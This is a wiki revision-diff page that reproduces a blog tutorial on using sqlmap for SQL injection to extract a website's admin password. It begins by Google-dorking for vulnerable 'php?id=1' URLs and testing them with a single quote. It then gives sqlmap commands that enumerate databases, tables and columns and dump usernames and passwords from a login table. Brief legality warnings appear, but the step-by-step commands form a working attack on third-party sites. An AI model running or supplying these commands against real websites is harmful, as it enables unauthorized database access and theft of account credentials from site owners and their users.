Difference between revisions of "Sqlmap: memperoleh password database sql"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/ Kali Linux How To Use SQLmap for SQL Injection –...)
 
Line 8: Line 8:
 
Step 1 – Google for php?=id1
 
Step 1 – Google for php?=id1
  
Google for php?=id1
+
Google for php?=id1
  
 
add a Single quote… to the end of the URL.
 
add a Single quote… to the end of the URL.
Line 17: Line 17:
 
******
 
******
 
Step 2 – Kali SQLMAP – get website databases
 
Step 2 – Kali SQLMAP – get website databases
SQLMAP  – u http:\\website.com/page.php?id=1 –dbs
+
SQLMAP  – u http:\\website.com/page.php?id=1 –dbs
 +
 
 
This will fetch all available databases on the website.  Did you see them listed?
 
This will fetch all available databases on the website.  Did you see them listed?
  
 
******
 
******
 
Step 3 – Find the LOGIN table
 
Step 3 – Find the LOGIN table
SQLMAP  – u http:\\website.com/page.php?id=1 –D www – tables
+
SQLMAP  – u http:\\website.com/page.php?id=1 –D www – tables
  
 
Did you see all the TABLES on the website list out?
 
Did you see all the TABLES on the website list out?
Line 32: Line 33:
 
******
 
******
 
Step 4 – Get all the Login Data (from Step 3)
 
Step 4 – Get all the Login Data (from Step 3)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
+
 
 +
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
  
 
This should display columns with items such as Cookie, ID, IP, Password, Username.
 
This should display columns with items such as Cookie, ID, IP, Password, Username.
Line 38: Line 40:
 
******
 
******
 
Step 5 – Get Usernames (& Admin)
 
Step 5 – Get Usernames (& Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
+
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
 +
 
 
Look for “admin”
 
Look for “admin”
  
 
*****
 
*****
 
Step 6 – Get Passwords (of Admin)
 
Step 6 – Get Passwords (of Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
+
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
  
 
That’s it.
 
That’s it.
Line 55: Line 58:
  
 
* http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/
 
* http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/
 +
* http://oldmanlab.blogspot.sg/2012/03/sqlmap-tutorial-you-are-just.html

Revision as of 06:50, 16 July 2014

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Kali Linux How To Use SQLmap for SQL Injection – Find Website Admin Password 01/02/2014

How to test if a website is vulnerable to SQL injection. To be legal, use your own website. Step 1 – Google for php?=id1

Google for php?=id1

add a Single quote… to the end of the URL. so it reads php?=id1′ If you get an error the website is vulnerable. Go to step 2. If this is your own website – shut it down immediately. You need to secure it before you bring it back online.

Step 2 – Kali SQLMAP – get website databases

SQLMAP   – u http:\\website.com/page.php?id=1 –dbs

This will fetch all available databases on the website. Did you see them listed?

Step 3 – Find the LOGIN table

SQLMAP   – u http:\\website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!

Step 4 – Get all the Login Data (from Step 3)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

Step 5 – Get Usernames (& Admin)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Look for “admin”

Step 6 – Get Passwords (of Admin)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

That’s it.




Referensi